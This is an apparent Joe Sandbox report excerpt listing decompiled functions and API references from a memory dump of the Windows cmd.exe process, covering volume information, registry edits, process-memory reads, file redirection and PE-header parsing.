                                    0x00000000
                                    0x00000000
                                    0x011ddaa6
                                    0x011ddaaf
                                    0x011eba90
                                    0x011eba90
                                    0x011ddaef
                                    0x011ddaef
                                    0x011ddaf6
                                    0x011ddb6f
                                    0x011ddb76
                                    0x011ddb7c
                                    0x011ddb86
                                    0x00000000
                                    0x00000000
                                    0x011ebb58
                                    0x011ebb58
                                    0x011ebb5f
                                    0x011ebb6f
                                    0x011ebb7c
                                    0x00000000
                                    0x011ebb81
                                    0x011ddafd
                                    0x011ddafe
                                    0x011eba98
                                    0x011eba9d
                                    0x011ebaa2
                                    0x011ebaaa
                                    0x011ddb2a
                                    0x011ddb2c
                                    0x011ebaff
                                    0x011ebb03
                                    0x011ebb08
                                    0x011ebb0e
                                    0x011ebb10
                                    0x011ebb18
                                    0x00000000
                                    0x00000000
                                    0x011ebb1a
                                    0x011ebb1c
                                    0x011ebb1c
                                    0x011ddb34
                                    0x011ebb89
                                    0x011ebb89
                                    0x011ebb94
                                    0x00000000
                                    0x011ebb94
                                    0x011ddb40
                                    0x00000000
                                    0x011ddb40
                                    0x011ebab5
                                    0x011ebabc
                                    0x00000000
                                    0x00000000
                                    0x011ebac2
                                    0x011ebac7
                                    0x011ebac9
                                    0x011ebac9
                                    0x011ebae1
                                    0x00000000
                                    0x011ebae7
                                    0x011ebae7
                                    0x011ebaec
                                    0x011ebaee
                                    0x011ebaee
                                    0x011ebaf4
                                    0x011ebaf5
                                    0x011ddb17
                                    0x011ddb17
                                    0x011ddb1c
                                    0x011ddb24
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ddb24
                                    0x011ebae1
                                    0x011ddb09
                                    0x011ddb11
                                    0x00000000
                                    0x011ddb11
                                    0x011ddab7
                                    0x011ddac1
                                    0x00000000
                                    0x00000000
                                    0x011ddad0
                                    0x011eba43
                                    0x011eba4a
                                    0x00000000
                                    0x00000000
                                    0x011eba56
                                    0x011eba5c
                                    0x011eba66
                                    0x00000000
                                    0x00000000
                                    0x011eba6e
                                    0x011eba7e
                                    0x011eba83
                                    0x011eba84
                                    0x011eba86
                                    0x011ebb43
                                    0x011ebb43
                                    0x011ebb4b
                                    0x011ebb4e
                                    0x00000000
                                    0x011ebb4e
                                    0x011ddad6
                                    0x011ddad6
                                    0x011ddad8
                                    0x011ddadd
                                    0x011ddae2
                                    0x011ebb26
                                    0x011ebb36
                                    0x011ebb3b
                                    0x011ebb3c
                                    0x011ebb3e
                                    0x00000000
                                    0x011ebb3e
                                    0x011ddaea
                                    0x00000000
                                    0x011ddb43
                                    0x011ddb43
                                    0x011ddb46
                                    0x011ddb48
                                    0x00000000
                                    0x011dda9b
                                    0x011dda66
                                    0x011dda67
                                    0x011dda6c
                                    0x011dda74
                                    0x00000000
                                    0x00000000
                                    0x011dda80
                                    0x011dda83
                                    0x011dda88
                                    0x011dda8b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dd9f1
                                    0x011dd9f1
                                    0x011dd9f1
                                    0x011dd9f4
                                    0x011dd9f6
                                    0x011dd9f9
                                    0x011dd9f9
                                    0x011dd9fc
                                    0x011dd9ff
                                    0x011dda08
                                    0x011dda10
                                    0x011dda14
                                    0x011dda1c
                                    0x00000000
                                    0x00000000
                                    0x011dda1e
                                    0x011dda21
                                    0x011dda23
                                    0x011dda26
                                    0x011dda26
                                    0x011dda29
                                    0x011dda2c
                                    0x011dda35
                                    0x011dda39
                                    0x011eba28
                                    0x011eba28
                                    0x011dda46
                                    0x011dda46
                                    0x011dda49
                                    0x011dda4b
                                    0x011dda4f
                                    0x00000000

                                    APIs
                                    • memset.MSVCRT ref: 011DD9BE
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _get_osfhandle.MSVCRT ref: 011DDAA6
                                    • _get_osfhandle.MSVCRT ref: 011DDAB7
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DDB53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _get_osfhandlememset
                                    • String ID: DPATH
                                    • API String ID: 3784859044-2010427443
                                    • Opcode ID: 58cb7c300d46dc766b43c71f9d40c6ecaf1f5ea46c9aa7ae8ea77bd334a03f73
                                    • Instruction ID: 63e866420da51ac2be241b7621f2ca99e67be17c8e9060e40eaa3eab2779bae5
                                    • Opcode Fuzzy Hash: 58cb7c300d46dc766b43c71f9d40c6ecaf1f5ea46c9aa7ae8ea77bd334a03f73
                                    • Instruction Fuzzy Hash: E0912870A00516AFDF2DEFE8EC88AAABBE1FF54318B144159E505972C4DB31A980CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F6B30, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 140COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 38%
                                    			E011F6B30(void* __ebx, signed short* _a4) {
				signed int _v8;
				char _v268;
				intOrPtr _v272;
				short _v276;
				short _v790;
				signed short _v802;
				long _v804;
				void* __edi;
				void* __esi;
				signed int _t20;
				short _t22;
				intOrPtr _t23;
				signed short _t24;
				void* _t29;
				signed short _t33;
				signed short _t34;
				long _t52;
				signed short* _t54;
				void* _t56;
				signed short* _t57;
				long _t60;
				void* _t66;
				long _t68;
				DWORD* _t70;
				signed short* _t71;
				void* _t72;
				signed short* _t74;
				void* _t75;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t81;

				_t56 = __ebx;
				_t80 = (_t78 & 0xfffffff8) - 0x320;
				_t20 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t20 ^ _t80;
				_t22 =  *L" :\\"; // 0x3a0020
				_t74 = _a4;
				_t70 = 0;
				_v276 = _t22;
				_t23 =  *0x11d3a8c; // 0x5c
				_t68 =  *_t74 & 0x0000ffff;
				_v272 = _t23;
				_v804 = 0;
				if(_t68 != 0) {
					_t57 = _t74;
					_t71 =  &(_t57[1]);
					do {
						_t24 =  *_t57;
						_t57 =  &(_t57[1]);
					} while (_t24 != _v804);
					if(_t57 - _t71 >> 1 != 2 || _t74[1] != 0x3a || iswalpha(_t68) == 0) {
						E011E25D9(L"\r\n");
						_pop(_t60);
						_push(0);
						_push(0xf);
						goto L19;
					} else {
						_t33 = towupper( *_t74 & 0x0000ffff);
						_t70 = 0;
						goto L10;
					}
				} else {
					_t54 =  *0x1213cb8;
					if(_t54 == 0) {
						_t54 = 0x1213ab0;
					}
					_t33 = towupper( *_t54 & 0x0000ffff);
					L10:
					_pop(_t66);
					_t34 = _t33 & 0x0000ffff;
					_t76 = _t34 & 0x0000ffff;
					_v276 = _t34;
					if(GetVolumeInformationW( &_v276,  &_v790, 0x101,  &_v804, _t70, _t70, _t70, _t70) != 0) {
						_push(_t76);
						_push(L"%c");
						_push(0x104);
						_push(0x1213d00);
						if(_v790 == 0) {
							E011E274C();
							E011DC108(_t66, 0x235e, 1, 0x1213d00);
							_t81 = _t80 + 0x1c;
						} else {
							E011E274C();
							_push( &_v790);
							E011DC108(_t66, 0x235f, 2, 0x1213d00);
							_t81 = _t80 + 0x20;
						}
						_push(_v804 & 0x0000ffff);
						E011E274C( &_v268, 0x80, L"%04X-%04X", _v802 & 0x0000ffff);
						E011DC108(_t66, 0x235b, 1,  &_v268);
						_t80 = _t81 + 0x20;
						_t29 = 0;
					} else {
						E011E25D9(L"\r\n");
						_t52 = GetLastError();
						_t60 = 0x15;
						if(_t52 != _t60) {
							_t60 = GetLastError();
						}
						_push(_t70);
						_push(_t60);
						L19:
						E011DC5A2(_t60);
						_t29 = 1;
					}
				}
				_pop(_t72);
				_pop(_t75);
				return E011E6FD0(_t29, _t56, _v8 ^ _t80, _t68, _t72, _t75);
			}



































                                    0x011f6b30
                                    0x011f6b38
                                    0x011f6b3e
                                    0x011f6b45
                                    0x011f6b4c
                                    0x011f6b52
                                    0x011f6b56
                                    0x011f6b58
                                    0x011f6b5f
                                    0x011f6b64
                                    0x011f6b67
                                    0x011f6b6e
                                    0x011f6b75
                                    0x011f6b91
                                    0x011f6b93
                                    0x011f6b96
                                    0x011f6b96
                                    0x011f6b99
                                    0x011f6b9c
                                    0x011f6baa
                                    0x011f6cc4
                                    0x011f6cc9
                                    0x011f6ccc
                                    0x011f6ccd
                                    0x00000000
                                    0x011f6bcb
                                    0x011f6bcf
                                    0x011f6bd5
                                    0x00000000
                                    0x011f6bd5
                                    0x011f6b77
                                    0x011f6b77
                                    0x011f6b7e
                                    0x011f6b80
                                    0x011f6b80
                                    0x011f6b89
                                    0x011f6bd7
                                    0x011f6bd7
                                    0x011f6bda
                                    0x011f6bde
                                    0x011f6be1
                                    0x011f6c09
                                    0x011f6c3a
                                    0x011f6c3b
                                    0x011f6c45
                                    0x011f6c4a
                                    0x011f6c4b
                                    0x011f6c69
                                    0x011f6c76
                                    0x011f6c7b
                                    0x011f6c4d
                                    0x011f6c4d
                                    0x011f6c56
                                    0x011f6c5f
                                    0x011f6c64
                                    0x011f6c64
                                    0x011f6c83
                                    0x011f6c9c
                                    0x011f6cb3
                                    0x011f6cb8
                                    0x011f6cbb
                                    0x011f6c0b
                                    0x011f6c10
                                    0x011f6c16
                                    0x011f6c1e
                                    0x011f6c21
                                    0x011f6c29
                                    0x011f6c29
                                    0x011f6c2b
                                    0x011f6c2c
                                    0x011f6ccf
                                    0x011f6ccf
                                    0x011f6cd7
                                    0x011f6cd8
                                    0x011f6c09
                                    0x011f6ce0
                                    0x011f6ce1
                                    0x011f6cec

                                    APIs
                                    • towupper.MSVCRT ref: 011F6B89
                                    • iswalpha.MSVCRT ref: 011F6BBC
                                    • towupper.MSVCRT ref: 011F6BCF
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 011F6C01
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6C16
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6C23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                    • String ID: :\$%04X-%04X
                                    • API String ID: 4001382275-3541097225
                                    • Opcode ID: 431c224ec335d2b4ab4bf965216a75d77cd70cf90f2f8f08e135fcf3511fa8e0
                                    • Instruction ID: 0c3c56ab88baa50d37139f89b05fd20c98300b6c5c9de13c38edc88f738beb76
                                    • Opcode Fuzzy Hash: 431c224ec335d2b4ab4bf965216a75d77cd70cf90f2f8f08e135fcf3511fa8e0
                                    • Instruction Fuzzy Hash: A1412D72A04211AAD738EBA59C19FB777ECEFA8B14F00041DFA95C7180EB74D540C7A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F587B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E011F587B(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _t23;
				char _t38;
				short* _t44;
				char* _t48;
				char* _t51;
				char* _t55;
				char* _t56;
				char* _t57;
				void* _t58;

				_t45 = __ecx;
				_push(0x18);
				_push(0x11fc0e0);
				E011E7678(__ebx, __edi, __esi);
				_t44 = __edx;
				 *(_t58 - 0x20) = __ecx;
				_t23 =  *(_t58 + 8);
				if(_t23 == 0 ||  *_t23 == 0) {
					__imp__RegDeleteKeyExW(_t45, _t44, 0, 0);
					_t55 = _t23;
					 *(_t58 - 0x1c) = _t55;
					if(_t55 == 0) {
						goto L16;
					}
					_t56 = RegOpenKeyExW( *(_t58 - 0x20), _t44, 0, 0x2000000, _t58 - 0x24);
					 *(_t58 - 0x1c) = _t56;
					if(_t56 == 0) {
						_t55 = RegDeleteValueW( *(_t58 - 0x24), 0x11d24ac);
						 *(_t58 - 0x1c) = _t55;
						if(_t55 != 0) {
							_push(0);
							E011DC5A2(_t45);
							_t45 = _t55;
						}
						RegCloseKey( *(_t58 - 0x24));
					} else {
						if(_t56 != 2) {
							_push(0);
							E011DC5A2(_t45);
							_t45 = _t56;
						}
					}
					goto L15;
				} else {
					_t55 = RegCreateKeyExW(__ecx, __edx, 0, 0, 0, 2, 0, _t58 - 0x20, 0);
					 *(_t58 - 0x1c) = _t55;
					if(_t55 != 0) {
						L7:
						_push(0);
						_push(_t55);
						E011DC5A2(_t45);
						E011DC5A2(_t45, 0x235d, 1, _t44);
						goto L15;
					} else {
						_t51 =  *(_t58 + 8);
						_t48 = _t51;
						_t57 =  &(_t48[2]);
						do {
							_t38 =  *_t48;
							_t48 =  &(_t48[2]);
						} while (_t38 != 0);
						_t45 = _t48 - _t57 >> 1;
						_t55 = RegSetValueExW( *(_t58 - 0x20), 0, 0, 1, _t51, 2 + (_t48 - _t57 >> 1) * 2);
						 *(_t58 - 0x1c) = _t55;
						RegCloseKey( *(_t58 - 0x20));
						if(_t55 != 0) {
							goto L7;
						}
						_push( *(_t58 + 8));
						_push(_t44);
						E011E25D9(L"%s=%s\r\n");
						L15:
						if(_t55 != 0) {
							L19:
							return E011E76BD(_t55);
						}
						L16:
						 *((intOrPtr*)(_t58 - 4)) = 0;
						if(E011E7797(_t45) != 0) {
							 *0x121c020(0x8000000, 0, 0, 0);
						}
						 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
						goto L19;
					}
				}
			}












                                    0x011f587b
                                    0x011f587b
                                    0x011f587d
                                    0x011f5882
                                    0x011f5887
                                    0x011f5889
                                    0x011f588c
                                    0x011f5893
                                    0x011f5930
                                    0x011f5936
                                    0x011f5938
                                    0x011f593d
                                    0x00000000
                                    0x00000000
                                    0x011f5953
                                    0x011f5955
                                    0x011f595a
                                    0x011f597a
                                    0x011f597c
                                    0x011f5981
                                    0x011f5983
                                    0x011f5985
                                    0x011f598b
                                    0x011f598b
                                    0x011f598f
                                    0x011f595c
                                    0x011f595f
                                    0x011f5961
                                    0x011f5963
                                    0x011f5969
                                    0x011f5969
                                    0x011f595f
                                    0x00000000
                                    0x011f58a2
                                    0x011f58b5
                                    0x011f58b7
                                    0x011f58bc
                                    0x011f5913
                                    0x011f5913
                                    0x011f5914
                                    0x011f5915
                                    0x011f5922
                                    0x00000000
                                    0x011f58be
                                    0x011f58be
                                    0x011f58c1
                                    0x011f58c3
                                    0x011f58c6
                                    0x011f58c6
                                    0x011f58c9
                                    0x011f58cc
                                    0x011f58d3
                                    0x011f58eb
                                    0x011f58ed
                                    0x011f58f3
                                    0x011f58fb
                                    0x00000000
                                    0x00000000
                                    0x011f58fd
                                    0x011f5900
                                    0x011f5906
                                    0x011f5995
                                    0x011f5997
                                    0x011f59dc
                                    0x011f59e3
                                    0x011f59e3
                                    0x011f5999
                                    0x011f5999
                                    0x011f59a3
                                    0x011f59ad
                                    0x011f59ad
                                    0x011f59b3
                                    0x00000000
                                    0x011f59b3
                                    0x011f58bc

                                    APIs
                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58AF
                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0), ref: 011F58E5
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58F3
                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F5930
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F594D
                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,011D24AC,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F5974
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F598F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseDeleteValue$CreateOpen
                                    • String ID: %s=%s
                                    • API String ID: 1019019434-1087296587
                                    • Opcode ID: 3e8eb67b1e6a88b527e521f8d30474403b6c310a0da718c821254a4e3c02e35c
                                    • Instruction ID: 85b48d7eeabf79c9d233efdde780bb9a860294e60f88be58d793f1591e34926a
                                    • Opcode Fuzzy Hash: 3e8eb67b1e6a88b527e521f8d30474403b6c310a0da718c821254a4e3c02e35c
                                    • Instruction Fuzzy Hash: 3D31B071D00615AAEB3D9B5A9C0DEAF7E79EF8AF64B05410CF90566250E7204E01CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F53E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 71%
                                    			E011F53E0(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v968;
				intOrPtr _v1004;
				intOrPtr _v1140;
				void _v1148;
				void _v1152;
				void _v1156;
				void _v1160;
				long _v1164;
				void* _v1184;
				char _v1188;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				void* _t42;
				struct HINSTANCE__* _t47;
				void* _t62;
				void* _t63;
				signed int _t64;

				_t60 = __edx;
				_t22 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t22 ^ _t64;
				_t62 = __ecx;
				_v1152 = 0;
				if( *0x1218104 != 0) {
					L4:
					_t63 =  *0x1218100;
					L5:
					if(_t63 != 0) {
						 *0x12194b4(_t62, 0,  &_v1188, 0x18, 0);
						if( *_t63() >= 0) {
							_t63 = _v1184;
							if(ReadProcessMemory(_t62, _t63,  &_v1148, 0x470,  &_v1164) != 0) {
								if(_v1164 < 0xb4 || _v1004 - _t63 <= 0xb4) {
									if(ReadProcessMemory(_t62, _v1140 + 0x3c,  &_v1160, 4, 0) != 0 && ReadProcessMemory(_t62, _v1140 + _v1160 + 4,  &_v1156, 2, 0) != 0) {
										_t60 = _v1160 + _v1140 + 0x18;
										_t42 = E011F573B(_v1156, _v1160 + _v1140 + 0x18);
										if(_t42 != 0) {
											ReadProcessMemory(_t62, _t42,  &_v1152, 2, 0);
										}
									}
								} else {
									_v1152 = _v968;
								}
							}
						}
					}
					return E011E6FD0(_v1152, 0, _v8 ^ _t64, _t60, _t62, _t63);
				}
				_t47 = LoadLibraryExW(L"NTDLL.DLL", 0, 0);
				 *0x1218104 = _t47;
				if(_t47 == 0) {
					 *0x1218104 =  *0x1218104 | 0xffffffff;
					goto L4;
				} else {
					_t63 = GetProcAddress(_t47, "NtQueryInformationProcess");
					 *0x1218100 = _t63;
					goto L5;
				}
			}























                                    0x011f53e0
                                    0x011f53eb
                                    0x011f53f2
                                    0x011f53fc
                                    0x011f53fe
                                    0x011f540b
                                    0x011f5440
                                    0x011f5440
                                    0x011f5446
                                    0x011f5448
                                    0x011f545c
                                    0x011f5466
                                    0x011f546c
                                    0x011f548f
                                    0x011f54a0
                                    0x011f54db
                                    0x011f551a
                                    0x011f551c
                                    0x011f5523
                                    0x011f5531
                                    0x011f5531
                                    0x011f5523
                                    0x011f54ae
                                    0x011f54b5
                                    0x011f54b5
                                    0x011f54a0
                                    0x011f548f
                                    0x011f5466
                                    0x011f554e
                                    0x011f554e
                                    0x011f5414
                                    0x011f541a
                                    0x011f5421
                                    0x011f5439
                                    0x00000000
                                    0x011f5423
                                    0x011f542f
                                    0x011f5431
                                    0x00000000
                                    0x011f5431

                                    APIs
                                    • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 011F5414
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 011F5429
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000470,?), ref: 011F5487
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 011F54D3
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 011F54FA
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 011F5531
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                    • String ID: NTDLL.DLL$NtQueryInformationProcess
                                    • API String ID: 1580871199-2613899276
                                    • Opcode ID: 5e8117be712654ac61dab451284ae9d2e02ee49defa53aab92debe33027f431c
                                    • Instruction ID: 2d2afdad2ff707ede3e1d5cbb998ba88fd6386d677440dfcc771fd4dd70a5b1b
                                    • Opcode Fuzzy Hash: 5e8117be712654ac61dab451284ae9d2e02ee49defa53aab92debe33027f431c
                                    • Instruction Fuzzy Hash: 044187B1A001199BEB64CB25DC88B7E777EEB54648F00409DEB09E3245DB309E81CF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5DB5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 48%
                                    			E011D5DB5(void* __ecx, signed int __edx) {
				long _v8;
				WCHAR* _v12;
				struct _SECURITY_ATTRIBUTES _v24;
				void* __ebx;
				signed int _t15;
				long _t17;
				void* _t19;
				long _t22;
				long _t23;
				WCHAR* _t32;
				signed int _t38;
				void* _t39;
				void* _t40;
				signed int _t42;

				_v24.lpSecurityDescriptor = _v24.lpSecurityDescriptor & 0x00000000;
				_t39 = __ecx;
				_v24.nLength = 0xc;
				_t23 = 3;
				_t41 = __edx;
				_t38 = __edx & _t23;
				_v24.bInheritHandle = 1;
				if(_t38 > 2) {
					L2:
					_t42 = _t41 | 0xffffffff;
					L3:
					return _t42;
				}
				_t15 = __edx & 0x00000009;
				if(_t15 != 9) {
					_push(L"con");
					_push(__ecx);
					if(_t38 != 0) {
						_t41 = (__edx | 1) << 0x1e;
						__imp___wcsicmp();
						if(_t15 != 0) {
							_t23 = 1;
						}
						_v8 = 2;
					} else {
						_t41 = 0x80000000;
						_v8 = 3;
						__imp___wcsicmp();
						if(_t15 == 0) {
							_t23 = 1;
						}
					}
					_t32 = E011E22C0(_t23, _t39);
					_t17 = _v8;
					_v12 = _t32;
					if(_t17 == 2) {
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, 3, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 != 0xffffffff) {
							goto L8;
						}
						_t17 = _v8;
						_t32 = _v12;
						goto L7;
					} else {
						L7:
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, _t17, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 == 0xffffffff) {
							_t22 = GetLastError();
							 *0x1213cf0 = _t22;
							if(_t22 == 0x6e) {
								 *0x1213cf0 = 2;
							}
							goto L2;
						}
						L8:
						__imp___open_osfhandle(_t40, 8);
						_t42 = _t19;
						if(_t42 == 0xffffffff) {
							CloseHandle(_t40);
						}
						goto L3;
					}
				}
				goto L2;
			}

















                                    0x011d5dbd
                                    0x011d5dc6
                                    0x011d5dc8
                                    0x011d5dcf
                                    0x011d5dd2
                                    0x011d5dd5
                                    0x011d5dd7
                                    0x011d5ddd
                                    0x011d5de8
                                    0x011d5de8
                                    0x011d5dec
                                    0x011d5df3
                                    0x011d5df3
                                    0x011d5de1
                                    0x011d5de6
                                    0x011d5df6
                                    0x011d5dfb
                                    0x011d5dfe
                                    0x011e9ce0
                                    0x011e9ce3
                                    0x011e9ced
                                    0x011e9cf1
                                    0x011e9cf1
                                    0x011e9cf2
                                    0x011d5e04
                                    0x011d5e04
                                    0x011d5e09
                                    0x011d5e10
                                    0x011d5e1a
                                    0x011d5e6d
                                    0x011d5e6d
                                    0x011d5e1a
                                    0x011d5e23
                                    0x011d5e25
                                    0x011d5e28
                                    0x011d5e2e
                                    0x011e9d0e
                                    0x011e9d14
                                    0x011e9d19
                                    0x00000000
                                    0x00000000
                                    0x011e9d1f
                                    0x011e9d22
                                    0x00000000
                                    0x011d5e34
                                    0x011d5e34
                                    0x011d5e43
                                    0x011d5e49
                                    0x011d5e4e
                                    0x011e9d36
                                    0x011e9d3c
                                    0x011e9d44
                                    0x011e9d4a
                                    0x011e9d4a
                                    0x00000000
                                    0x011e9d44
                                    0x011d5e54
                                    0x011d5e57
                                    0x011d5e5d
                                    0x011d5e64
                                    0x011e9d2b
                                    0x011e9d2b
                                    0x00000000
                                    0x011d5e64
                                    0x011d5e2e
                                    0x00000000

                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011D5E10
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,08000080,00000003,08000080,00000000), ref: 011D5E43
                                    • _open_osfhandle.MSVCRT ref: 011D5E57
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011E9D2B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                    • String ID: con
                                    • API String ID: 689241570-4257191772
                                    • Opcode ID: 61c2be903768f69d0c8bf785e21a17f9b27e0fa5495130a29794849cf9f2b26c
                                    • Instruction ID: d5e535bad670562cf576daf8d1995ffdf3640aac4a5b5a8043e3d48a8137f881
                                    • Opcode Fuzzy Hash: 61c2be903768f69d0c8bf785e21a17f9b27e0fa5495130a29794849cf9f2b26c
                                    • Instruction Fuzzy Hash: 15313932A00514AFE73CDAACA84DB6EBAFAE751639F210319E921E32C0DF704D018761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F554F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99memoryfileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 96%
                                    			E011F554F(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				long _v16;
				char _v76;
				signed short _v80;
				char _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				signed int _t15;
				signed short _t23;
				signed short* _t31;
				signed int _t32;
				void* _t42;
				void* _t43;
				signed int _t44;

				_t41 = __edx;
				_t12 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t12 ^ _t44;
				_t42 = 0;
				_t32 = 0;
				if(__ecx != 0) {
					_t43 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t43 == 0xffffffff) {
						L16:
						_t15 = _t32;
						goto L17;
					}
					_t41 =  &_v76;
					if(E011F5768(_t43,  &_v76, 0x40) != 0 && 0x5a4d == _v76 && SetFilePointer(_t43, _v16, 0, 0) != 0xffffffff) {
						_t41 =  &_v100;
						if(E011F5768(_t43,  &_v100, 4) != 0 && _v100 == 0x4550) {
							_t41 =  &_v96;
							if(E011F5768(_t43,  &_v96, 0x14) != 0) {
								_t23 = _v80;
								if(_t23 != 0) {
									_t42 = HeapAlloc(GetProcessHeap(), 8, _t23 & 0x0000ffff);
									if(_t42 != 0) {
										_t41 = _t42;
										if(E011F5768(_t43, _t42, _v80 & 0x0000ffff) != 0) {
											_t41 = _t42;
											_t31 = E011F573B(_v96, _t42);
											if(_t31 != 0) {
												_t32 =  *_t31 & 0x0000ffff;
											}
										}
										RtlFreeHeap(GetProcessHeap(), 0, _t42);
									}
								}
